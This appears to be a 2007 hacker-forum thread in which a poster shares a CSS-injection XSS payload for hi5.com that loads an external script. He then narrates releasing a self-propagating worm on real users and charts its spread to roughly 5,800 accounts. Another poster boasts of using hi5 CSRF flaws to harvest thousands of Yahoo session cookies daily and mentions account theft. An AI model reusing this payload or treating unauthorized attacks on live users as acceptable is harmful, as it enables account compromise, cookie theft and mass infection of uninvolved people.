[www.hi5.com]

style:

<style type='text/css'>strong{
-moz-binding:url(" [ha.ckers.org]");
}

strong{
background:url("javascript:void(document.body.appendChild(document.createElement('script')).src=' [h4k.in]');");
}
</style>

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 1 time(s). Last edit at 12/23/2007 01:10AM by sirdarckcat.

wow. xss worm hitting hi5 in less than 24h...

btw, what is i.js doing?

i.js is nothing.. that's the XSS test case from .mario :P

the worm is going very slow, since it's programmed just for firefox.. since I'm lazy and I dont wanna find out why it's not working on IE

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

They know about those issues from long time ago. Is not a secret that hi5 have csrf vuln in at least 4 places on the user profile pages. If you'll search random, you will find some hi-jacked or special made accounts used to stole users passwords or cookies from another web services (Yahoo, Hotmail etc). We tested hi5 to find all the csrf vulns and the results are:
- on the main page of the profile: csrf affecting IE6, Firefox and Safari for Windows
- on another profile page (shhht): csrf affecting IE6, IE7, Firefox, Safari for Windows and Opera
- In the comment box are 2 csrf vuln's but I was to lazy to find out how it works and which browser is affected. But a friend of mine is using that shit to steal "beautiful babes" accounts :)

Hi5 xss worms are up from long time ago. You can find full working worms sources on spanish and turkish hacking websites.

Anyway, nice find sirdarckcat. I was glad 1 month ago when I discovered for the first time those xss's but when I google it the results was very dissapointing for me. Hi5 is vulnerable from a very long time and those issues are public disclosed by security/hacking teams for at least 6 months.



Edited 1 time(s). Last edit at 12/24/2007 07:08PM by nemessis.

[www.hi5.com]

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 2 time(s). Last edit at 12/24/2007 08:41PM by sirdarckcat.

btw if you use noscript or firefox 3, the exploit wont work.

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

Do you have a method to find the results? I'm curios about spreading speed.

My results in 10 hours (this was my first attempt and I attacked Yahoo accounts, not hi5 accounts but i used the same hi5 vuln to do that - just IE6 browser was affected in this attempt) [rapidshare.com]

With IE6 + Firefox affected & a grabber who don't display empty/incomplete cookies i've got 2K of GOOD Yahoo cookies/day. So there is a big impact if someone use a social network like hi5 for personal data stealing.

[www.rstcenter.com] - Romanian Security Team
Inchirieri limuzine



Edited 1 time(s). Last edit at 12/25/2007 08:03AM by nemessis.

Nemessis, ten users so far. Seems like hi5 users are not Firefox fans.

Yes indeed. Most of them are IE6/IE7 users.

[www.rstcenter.com] - Romanian Security Team
Inchirieri limuzine

this works for IE6/7 but after exploitation it shows an error, anyway.. after exploitation..

Take into consideration it was christmas eve, no one is at hi5 at christmas..

Anny way, I recieve a friend request for each infected victim so.. so far, 15, from which 13 are real.. if this is really exponential, tomorrow I should have like 3k friends, and 40k after that.. etc..

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

Nice. We didn't succeed to make a working exploit for IE7 on the main page of the profile.

[www.rstcenter.com] - Romanian Security Team
Inchirieri limuzine

there are now 82 infected.
7 are not infected, but sent the friend request, I dunno why.. maybe they use Opera,/Safari/NoScript..

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

A chart.. hey it is exponential.. anyway, it looks quadratic to me..



with help of thornmaker, and a very cool applet, it appears that the growth of the worm follows:

4.07271957142175*(1.049393949541566)^time



I'm thinking that the following worms should have google analytics..

For the record..

Account created:
hi5 <info@hi5.com> Welcome to hi5! Mon, 24 Dec 2007 16:26:00 -0700

The worm was on like.. 10 minutes after that.

I searched for random persons and sent them friends requests.. so they check my the profile.

The first victim:

"info@hi5.com" <info@hi5.com> v4k3 Lozano has accepted your Friend Request Mon, 24 Dec 2007 18:39:52 -0700

It's a shame she deleted the account:

[hi5.com]

She deleted the account.. on Wed, 26 Dec 2007 13:17:40 -0700

At 2:37 of GMT-6 of Wednesday 26.. the script that added friends was slower than the users sending friend requests.

On wednesday, spamcero.com staff sent an e-mail asking me to stop the e-mails.. so I changed the mail of registration.

and well, no word from hi5.com staff.. yet

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 12 time(s). Last edit at 12/26/2007 03:07PM by sirdarckcat.

This thing is going to reach "Singularity" in less than 24h!

Over 3000 added now. Fascinating to see it spreading.

5000 friends. Over and out. Santa removed.

actually the account was still there, I was still able to add friends, it reached 5,800, and then I was banned.

it was cool :P, the next worm should have google analytics, it would make the things much easier to track :P..

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

This is the last chart I was able to get:



You can clearly see where I was not able anymore of accepting new friends.. they where arriving too fast


anyway, that stops on 1037 friends, the total was 5800, but I'm not able to get the other data since.. well.. the e-mail server collapsed.

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 1 time(s). Last edit at 12/27/2007 08:31PM by sirdarckcat.

I checked today again the e-mail this is the last chart:



amazing.. even do it's not spreading anymore, all those persons added "Santa" as a friend.

And here's all the love the affected users sent to santa:

[www.hi5.com]

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 1 time(s). Last edit at 12/29/2007 01:16PM by sirdarckcat.